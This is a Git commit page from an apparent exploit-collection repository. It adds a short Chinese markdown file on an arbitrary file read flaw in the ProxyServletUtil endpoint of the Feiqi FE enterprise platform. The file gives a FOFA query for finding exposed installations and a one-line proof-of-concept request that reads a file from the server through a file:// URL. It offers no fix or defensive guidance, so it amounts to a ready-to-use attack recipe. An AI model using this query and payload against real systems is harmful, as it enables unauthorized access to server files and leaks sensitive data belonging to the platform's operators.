admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md

Browse Source
This commit is contained in:
wy876 2024-04-17 20:02:02 +08:00 committed by GitHub
parent 8616603a03
commit 1a6a645e47
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 15 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md Normal file
View File

@ -0,0 +1,15 @@
## 飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞
飞企互联FE业务协作平台中的ProxyServletUti接口存在任意文件读取漏洞。攻击者可以通过构造特定请求读取服务器上的敏感文件。
## fofa
```
app="飞企互联-FE企业运营管理平台"
```
## poc
```
/ProxyServletUtil?url=file:///c:/Windows/win.ini
```